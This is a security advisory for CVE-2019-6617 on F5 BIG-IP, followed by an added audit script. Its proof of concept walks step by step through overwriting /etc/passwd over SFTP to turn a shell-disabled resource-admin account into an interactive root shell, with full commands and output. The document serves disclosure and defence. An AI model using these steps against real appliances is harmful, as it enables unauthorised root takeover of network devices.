Title: F5 BIG-IP Resource Administrator Privilege Escalation
Author: Rich Mirch
CVE: CVE-2019-6617
Vendor Advisory: https://support.f5.com/csp/article/K38941195
Description
An F5 BIG-IP account assigned the resource administrator role can still access the appliance over SFTP, as root, even when terminal access has been disabled for that account. This PoC shows that such an account can obtain a root shell and take full control of the appliance with terminal access disabled.
Technical details
A local account configured with the resource administrator role is created as a Linux user with uid 0, i.e. root. When terminal access is disabled (shell set to none), the account's login shell is /sbin/nologin, so interactive SSH logins are refused. The SFTP subsystem, however, remains reachable without any restriction. Because the account is a uid-0 Linux user, SFTP can read and overwrite any file on the system, including /etc/passwd, which is enough to re-enable an interactive root shell.
Note: The SSH service must be enabled and the management interface must be reachable by the attacker.
CVSS
Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C
Base: 7.2
Temporal: 6.9
Test Environment
F5 BIG-IP Virtual Edition 14.0.0.1
[root@bigip14:Active:Standalone] ~ # tmsh show sys version
Sys::Version
Main Package
Product BIG-IP
Version 14.0.0.1
Build 0.0.2
Edition Point Release 1
Date Fri Aug 17 16:22:25 PDT 2018
A resource administrator account (resadmin) with the following attributes was used for this PoC.
Note that the shell attribute is set to "none".
[root@bigip14:Active:Standalone] ~ # tmsh list auth user resadmin | grep -v encrypted-password
auth user resadmin {
description resadmin
partition Common
partition-access {
all-partitions {
role resource-admin
}
}
shell none
}
Proof Of Concept
[Step 1]
Show that resadmin cannot log in interactively over SSH.
$ ssh resadmin@5.6.7.8
Password:
Last login: Thu Sep 13 15:23:23 2018 from 1.2.3.4
This account is currently not available.
Connection to 5.6.7.8 closed.
[Step 2]
Connect to the appliance as resadmin via SFTP and retrieve the /etc/passwd file.
$ /usr/bin/sftp resadmin@5.6.7.8
Password:
Connected to 5.6.7.8.
sftp> get /etc/passwd
Fetching /etc/passwd to passwd
/etc/passwd 100% 1423 229.8KB/s 00:00
sftp> quit
[Step 3]
Update the downloaded passwd file locally, changing the login shell of the resadmin user from /sbin/nologin to /bin/bash (the original is kept as passwd.orig).
$ perl -p -i.orig -e 's!/sbin/nologin!/bin/bash! if /^resadmin/;' passwd
[Step 4]
Display a diff of the passwd change from step 3.
$ diff -u passwd.orig passwd
--- passwd.orig 2018-09-13 17:32:55.000000000 -0500
+++ passwd 2018-09-13 17:34:36.000000000 -0500
@@ -26,4 +26,4 @@
hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin
syscheck:x:199:10::/:/sbin/nologin
restnoded:x:198:198::/:/sbin/nologin
-resadmin:x:0:500:resadmin:/home/resadmin:/sbin/nologin
+resadmin:x:0:500:resadmin:/home/resadmin:/bin/bash
[Step 5]
SFTP as resadmin and upload the modified passwd file to /etc/passwd.
$ /usr/bin/sftp resadmin@5.6.7.8
Password:
Connected to 5.6.7.8.
sftp> cd /etc
sftp> put passwd
Uploading passwd to /etc/passwd
passwd 100% 1419 541.3KB/s 00:00
sftp> quit
[Step 6]
Log in as resadmin via SSH and obtain a bash shell running as root (uid 0).
$ ssh resadmin@5.6.7.8
Password:
Last login: Thu Sep 13 15:30:39 2018 from 1.2.3.4
[resadmin@bigip14:Active:Standalone] ~ # echo $SHELL
/bin/bash
[resadmin@bigip14:Active:Standalone] ~ # id
uid=0(root) gid=500(webusers) groups=500(webusers),495(sdm) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
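The following is an added example, not part of the original advisory or of F5's code. It generalizes the passwd edit from steps 3 and 4 and turns the root cause described under Technical details (a resource administrator being a second uid-0 Linux account) into an audit check. The helpers read passwd-format text on stdin so they can be run against a copy fetched over SFTP as in step 2. The sample passwd content is constructed for this example from the lines visible in the step 4 diff; the root and auditor lines are assumptions and do not come from the appliance.

```shell
#!/bin/sh
# Added example (not from the advisory): passwd helpers that generalize
# PoC steps 3-4 and audit for extra uid-0 accounts.
# SAMPLE_PASSWD is constructed; the root and auditor lines are assumptions.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin
syscheck:x:199:10::/:/sbin/nologin
restnoded:x:198:198::/:/sbin/nologin
resadmin:x:0:500:resadmin:/home/resadmin:/sbin/nologin
auditor:x:501:500:auditor:/home/auditor:/sbin/nologin'

# set_shell USER SHELL
# Reads passwd text on stdin and writes it to stdout with the login shell
# (field 7) of USER replaced. Every other line is passed through untouched,
# which is what the step 4 diff shows: a single changed line.
set_shell() {
    awk -F: -v OFS=: -v u="$1" -v s="$2" '$1 == u { $7 = s } { print }'
}

# uid0_accounts
# Reads passwd text on stdin and prints every account whose uid is 0 but
# whose name is not root. On the affected appliance a resource administrator
# lands here, which is why an unrestricted SFTP write is a root compromise.
uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }'
}

# shell_of USER
# Reads passwd text on stdin and prints the login shell of USER.
shell_of() {
    awk -F: -v u="$1" '$1 == u { print $7 }'
}

# Demonstration when run directly: audit the sample, then apply the PoC edit
# and confirm only resadmin's shell changed.
printf '%s\n' "$SAMPLE_PASSWD" | uid0_accounts
printf '%s\n' "$SAMPLE_PASSWD" | set_shell resadmin /bin/bash | shell_of resadmin
printf '%s\n' "$SAMPLE_PASSWD" | set_shell resadmin /bin/bash | shell_of hsqldb
```

Against a real copy of /etc/passwd, `uid0_accounts < passwd` is the defender-side check: any name it prints is an account that can do everything root can through any file-transfer path that is left open to it, regardless of what its tmsh shell attribute says.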
Timeline:
2018-09-13: Reported to vendor
2018-09-14: Vendor confirmed vulnerability
2018-09-26: Vendor requested embargo
2018-12-07: Contacted vendor for update
2019-04-30: Vendor released fix and advisory